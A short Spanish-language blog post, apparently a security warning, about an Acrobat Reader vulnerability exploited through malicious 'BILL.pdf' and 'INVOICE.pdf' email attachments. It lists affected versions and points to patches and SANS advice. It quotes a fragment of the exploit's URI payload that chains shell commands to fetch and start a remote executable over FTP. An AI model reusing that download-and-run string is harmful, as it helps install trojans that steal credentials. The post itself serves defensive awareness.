A pesar de que la vulnerabilidad no es nueva, y por lo tanto hay parche y nueva versión, existen numerosos exploit´s para Acrobat Reader.
Especialmente estan siendo como no..unos archivos adjuntos en el correo electrónico el principal foco de infección, los archivos vienen como “BILL.pdf” y “INVOICE.pdf”, aunque los nombres pueden cambiar según el exploit
obj<>>1&echo get /ldr.exe>>1&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1& start ldr.exe&” “&” “nul.bat)/S/ URI>
Los espacios en la cadena expuesta están orientado a impedir que los antivirus detecten el patrón malicioso.Por lo que una vez instalado el código malicioso, explota la vulnerabilidad, con la cual, se puede instalar un bot en la máquina como robo de credenciales, por un troyano.Se confirma que son vulnerables: Adobe Reader 8.1 y anteriores, Adobe Reader 7.0.9 y anteriores, Adobe Acrobat Professional, 3D y Standard 8.1 y versiones anteriores, Adobe Acrobat Professional, Standard, 3D y Elements 7.0.9 y anteriores.
Aqui os pongo lo que recomienda la gente de SANS.
Parches para Acrobat Reader
Destacar que la vulnerabilidad afecta solamente a Pc´s con Windows Xp con Internet Explorer 7.0
Asi que ya sabeis....más vale prevenir....
Información sacada del Blog de Sergio Hernando
No hay comentarios:
Publicar un comentario